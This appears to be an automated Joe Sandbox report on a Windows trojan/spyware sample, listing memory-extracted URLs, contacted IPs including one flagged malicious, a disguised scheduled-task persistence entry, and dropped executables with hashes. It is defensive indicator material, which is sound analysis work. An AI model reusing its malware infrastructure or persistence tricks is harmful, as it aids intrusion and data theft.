                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://support.google.com/chrome/?p=plugin_javaA70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://tempuri.org/Entity/Id22ResponsexC169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          https://cdn.discordapp.com4C169.exe, 00000017.00000002.597704836.0000000002FA1000.00000004.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://schemas.xmlsoap.org/ws/2004/06/addressingexA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://tempuri.org/Entity/Id19ResponsexC169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://cdn.discordapp.comC169.exe, 00000017.00000002.597768606.0000000002FB3000.00000004.00000001.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://support.google.com/chrome/?p=plugin_divxC169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                      high
                                                                                                                                      http://tempuri.org/Entity/Id13ResponseA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                        high
                                                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                          high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/CommittedA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                            high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                              high
                                                                                                                                              http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                                high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/sc/sctA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://socfinder.siteA70A.exe, 0000000B.00000000.415048801.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000002.576541484.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                                        high

                                                                                                                                                                                Contacted IPs


                                                                                                                                                                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
95.213.165.249 | host-data-coin-11.com | Russian Federation | 49505 | SELECTELRU | false
45.9.20.149 | unknown | Russian Federation | 35913 | DEDIPATH-LLCUS | true
162.159.135.233 | cdn.discordapp.com | United States | 13335 | CLOUDFLARENETUS | false

                                                                                                                                                                                Private

                                                                                                                                                                                IP
                                                                                                                                                                                192.168.2.1

                                                                                                                                                                                General Information

                                                                                                                                                                                Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                                                Analysis ID:531737
                                                                                                                                                                                Start date:01.12.2021
                                                                                                                                                                                Start time:10:02:38
                                                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                                                Overall analysis duration:0h 14m 32s
                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                Report type:light
                                                                                                                                                                                Sample file name:QMn13jz6nj.exe
                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                Number of analysed new started processes analysed:36
                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                Number of injected processes analysed:1
                                                                                                                                                                                Technologies:
                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                • HDC enabled
                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@33/32@65/4
                                                                                                                                                                                EGA Information:Failed
                                                                                                                                                                                HDC Information:
                                                                                                                                                                                • Successful, ratio: 64.8% (good quality ratio 45.4%)
                                                                                                                                                                                • Quality average: 55.5%
                                                                                                                                                                                • Quality standard deviation: 41.5%
                                                                                                                                                                                HCA Information:
                                                                                                                                                                                • Successful, ratio: 70%
                                                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                • Adjust boot time
                                                                                                                                                                                • Enable AMSI
                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                Warnings:
                                                                                                                                                                                • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                                • HTTP Packets have been reduced
                                                                                                                                                                                • TCP Packets have been reduced to 100
                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                                                                                                                                                                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com
                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                Simulations

                                                                                                                                                                                Behavior and APIs

Time | Type | Description
10:04:26 | Task Scheduler | Run new task: Firefox Default Browser Agent E57885D5CBE89C26 path: C:\Users\user\AppData\Roaming\ddigjgj
10:04:57 | API Interceptor | 1x Sleep call for process: AA02.exe modified
10:05:39 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
10:05:55 | Task Scheduler | Run new task: tkools.exe path: C:\Users\user\AppData\Local\Temp\6829558ede\tkools.exe

                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                IPs

                                                                                                                                                                                No context

                                                                                                                                                                                Domains

                                                                                                                                                                                No context

                                                                                                                                                                                ASN

                                                                                                                                                                                No context

                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                No context

                                                                                                                                                                                Dropped Files

                                                                                                                                                                                No context

                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_D466.exe_db70fee994372ed317f1af178f5e275a698060_66b74b96_1b8421ab\Report.wer
                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):0.8208203291713381
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:E/FE6X7jPQuN4lOQoJ7R3V6tpXIQcQec6tycEfcw3W+HbHg/8BRTf3o8Fa9iVfOs:qiLuNl8HQ0lrjJ5/u7szS274Itr
                                                                                                                                                                                MD5:23AB1CDA7F86C265D6863DEDC315625D
                                                                                                                                                                                SHA1:87D750256912BC84594B89310CD7B9018E6586A0
                                                                                                                                                                                SHA-256:C50B2EF12FB27DE639E5EE07477140FC66158D3E798A49A0DEA04143A0F1E2EC
                                                                                                                                                                                SHA-512:B284891D2FA86C6E25822574A6FC798C8812D9E3F400342A45BD8499FADC31F6DCA736DF1BC0BD6B136AC011CDB436EC2E8995B1B475C3262A07C2BDD37951F3
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
Preview: Version=1..EventType=BEX..EventTime=132828555049523774..ReportType=2..Consent=1..UploadTime=132828555379404520..ReportStatus=524384..ReportIdentifier=648a5de9-dd73-477a-8f55-222bc98a7d1d..IntegratorReportIdentifier=64082fe2-dad2-491d-a533-c018235159bf..Wow64Host=34404..Wow64Guest=332..NsAppName=D466.exe..AppSessionGuid=000019ec-0001-001c-bbff-52e9dde6d701..TargetAppId=W:000671e7afd3caa5c9368cbd1ed4d42993ee00002401!0000b2187debc6fde96e08d5014ce4f1af5cf568bce5!D466.exe..TargetAppVer=2021//11//12:
                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2114.tmp.dmp
                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                File Type:Mini DuMP crash report, 14 streams, Wed Dec 1 18:05:08 2021, 0x1205a4 type
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):40540
                                                                                                                                                                                Entropy (8bit):1.9473812799118777
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:iM4MlwxT/BOepbDmI5L82sf0Ye6lXpCjqTmISO:WhFceUPLpSO
                                                                                                                                                                                MD5:88C0D07F911DB2E607B3474BA0981EC9
                                                                                                                                                                                SHA1:BB0F558813CFB9EADA2675C259A7B7EE854DBD31
                                                                                                                                                                                SHA-256:DAD864879C5519F61320B45B416DF81280046F0159AE030883B16D8DCBCC8904
                                                                                                                                                                                SHA-512:AAC35A21934397EB5FCB58E5BD0FDD7A49708D229A8262BC3D1F60F7C33822F528EDC0F48ECD99B2D5F4C9B4A35C45AD4F35C950CFED8C530A158C3922FD5063
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER41AD.tmp.WERInternalMetadata.xml
                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):8412
                                                                                                                                                                                Entropy (8bit):3.7025484182768764
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:Rrl7r3GLNicw656YF+SU8hZetAgmfRRSqCpDQ89bIwsfNtYm:RrlsNiT656YcSU8SAgmfRRSXIDfN3
                                                                                                                                                                                MD5:222DE9514D79DF1715B4AB9D0B37A015
                                                                                                                                                                                SHA1:7F41D897D493E04E970DD5D24263E0086FD8D9B6
                                                                                                                                                                                SHA-256:2693C972E5D058373F1684599CCD18E4D142ADFC4E39B346F5B8068D73794804
                                                                                                                                                                                SHA-512:5FB1A7FF911ABFA2D63C12461C71C04F91330F6AF78874EBE88FB54BD08BA2BCD530339F2DFF0DFA5FE1BD35F11CBF45B509FC2ED675B813DB3E1446D69B712F
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
Preview: <?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>.. <WindowsNTVersion>10.0</WindowsNTVersion>.. <Build>17134</Build>.. <Product>(0x30): Windows 10 Pro</Product>.. <Edition>Professional</Edition>.. <BuildString>17134.1.amd64fre.rs4_release.180410-1804</BuildString>.. <Revision>1</Revision>.. <Flavor>Multiprocessor Free</Flavor>.. <Architecture>X64</Architecture>.. <LCID>1033</LCID>.. </OSVersionInformation>.. <ProcessInformation>.. <Pid>6636</Pid>..
                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER543C.tmp.xml
                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):4685
                                                                                                                                                                                Entropy (8bit):4.481319431173112
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:cvIwSD8zsrJgtWI99wjZyWSC8Bq8fm8M4JY28qFks4+q8v88HBizdz9d:uITfF6wjZTSNlJYzLK1Mzdz9d
                                                                                                                                                                                MD5:FA46A494E899F7539AB9219E49978456
                                                                                                                                                                                SHA1:B2A0E57D512AF9D5B28EDC50AE5A6DF819BA3C04
                                                                                                                                                                                SHA-256:5974A25349F5ADC7E3836CB533D4650C6A90D2A201B570B782E0E55F798C98E7
                                                                                                                                                                                SHA-512:FE59493C6065F494B7E0F99773614CF934969C236B7FBCED301B3DDAA90632360101969C73FC219CF10AE540D5D7A43CD0D70165DA6BF80E970FA47B976EBB5E
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1278915" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                                C:\ProgramData\sqlite3.dll
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\AA02.exe
                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):645592
                                                                                                                                                                                Entropy (8bit):6.50414583238337
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                                                                                                                MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                                                                                                                SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                                                                                                                SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                                                                                                                SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\C169.exe.log
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\C169.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):700
                                                                                                                                                                                Entropy (8bit):5.346524082657112
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                                                                                                                                                                MD5:65CF801545098D915A06D8318D296A01
                                                                                                                                                                                SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                                                                                                                                                                SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                                                                                                                                                                SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EE61.exe.log
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\EE61.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1192
                                                                                                                                                                                Entropy (8bit):5.359562127686337
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhuE4KaE4q0E4KiZhnRAE4Kzr7r1qE4UE4Ks:MxHKXwYHKhQnouHKaHxHKipAHKzvr1qq
                                                                                                                                                                                MD5:26BF5ED58FB6D9EEDD639F036FC882FE
                                                                                                                                                                                SHA1:21C3BFFF881964A836C3489507EAF36CD4BA652D
                                                                                                                                                                                SHA-256:2998ED6B8D1EB85DE8BEE772CEF62D57ED40224EECFE4349C3275F0C7AA96542
                                                                                                                                                                                SHA-512:F7B54F1EFC414567AD547823B8A178F562309507F91FF54EE3FDABF4D5AC8B3E9450E2A261D3CD6A34430E2ADF1D3354A82EA1E58A7362A207EA659304B80428
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml.Linq, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml.Linq\f54e3a73bfefb71eb6e1de09129af7f0\System.Xml.Linq.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",
                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\sqlite3[1].dll
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\AA02.exe
                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):645592
                                                                                                                                                                                Entropy (8bit):6.50414583238337
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
                                                                                                                                                                                MD5:E477A96C8F2B18D6B5C27BDE49C990BF
                                                                                                                                                                                SHA1:E980C9BF41330D1E5BD04556DB4646A0210F7409
                                                                                                                                                                                SHA-256:16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                                                                                                                                                                                SHA-512:335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Antivirus:
                                                                                                                                                                                • Antivirus: Metadefender, Detection: 3%, Browse
                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\890R9H47
                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\AA02.exe
                                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):118784
                                                                                                                                                                                Entropy (8bit):0.4589421877427324
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:T9YBfHNPM5ETQTbKPHBsRkOLkRf+z4QHItYysX0uhnHu132RUioVeINUravDLjY/:2WU+bDoYysX0uhnydVjN9DLjGQLBE3u
                                                                                                                                                                                MD5:16B54B80578A453C3615068532495897
                                                                                                                                                                                SHA1:03D021364027CDE0E7AE5008940FEB7E07CA293C
                                                                                                                                                                                SHA-256:75A16F4B0214A2599ECFBB1F66CAE146B257D11106494858969B19CABCB9B541
                                                                                                                                                                                SHA-512:C11979FE1C82B31FDD6457C8C2D157FB4C9DF4FE55457D54104B59F3F880898D82A947049DEB948CA48A5A64A75CFBFC38FDB2E108026EBE7CA9EBE8B1793797
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\A70A.exe
                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1285856
                                                                                                                                                                                Entropy (8bit):7.290553475161652
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24576:wAvkNkBobrsLgjMTarTbEzqFyyLGPaz8sMRK7wD9x3TOs7:n80iTjMTaf7iPaWRiwDf3TX
                                                                                                                                                                                MD5:31F17AD58D02772DF14EFAC37D416CD7
                                                                                                                                                                                SHA1:BC8EA09D50B5B794AF6C741B0C2D39C637831913
                                                                                                                                                                                SHA-256:21F7623006B248709A14CBFC507187FD44A8ADA2D0DD465FAA79317ECE02DC78
                                                                                                                                                                                SHA-512:7B3E94C7D808CF779704D33893D7B8EE9F56E445BE554B18A1F7476016AB68D2463F78A1278B1DAA6F8D4DD26535E1A50DA8A33412428E977D0659B8388B56DE
                                                                                                                                                                                Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: Metadefender, Detection: 26%
• Antivirus: ReversingLabs, Detection: 57%
Reputation:unknown
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\AA02.exe
                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):351744
                                                                                                                                                                                Entropy (8bit):6.209230188012359
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6144:LSZSB++2B2wScyH3/in9HQnIlf6BXcFNuAnYeOeNIqz1D+Jr:LSZSB+l2wScyH3/in9HQnI16BMFlnYe2
                                                                                                                                                                                MD5:349A409711C0A8F53C5F90A993A621F2
                                                                                                                                                                                SHA1:1A6A7E224441F3DEB794AD7C05BB337FEF53BB4A
                                                                                                                                                                                SHA-256:3601F18238F48E931AE54A92D8FC208AE9AB8B2A75ED898C7712048ABBC038B7
                                                                                                                                                                                SHA-512:E56482C233FEA482392D16BCF64046DCE24CCF1FE13737E0298E5003EAC3A35258220F605F8CE3F81F876935C813B9DCBCEB942A7A71D00C424E5CCE01B4BC97
                                                                                                                                                                                Malicious:true
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:unknown
                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\B6B5.exe
                                                                                                                                                                                Process:C:\Windows\explorer.exe
                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):336896
                                                                                                                                                                                Entropy (8bit):6.095936411614306
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6144:/PqsnKEQOJNhlS35U3TiXtHRW4YcT3XI6Ndc9NQ49UTiJFS:nnnKZOJNhlS35U3TiXtHRW4xT3Y649NW
                                                                                                                                                                                MD5:CBC4BD8906093C0CCC55379319D65DB1
                                                                                                                                                                                SHA1:27C67774153EDD261DB48ADA6477F1DC3D79447B
                                                                                                                                                                                SHA-256:571643F0741F9F26094CD42879636D79A3A1B196EF560438A8F74877CFD106A4
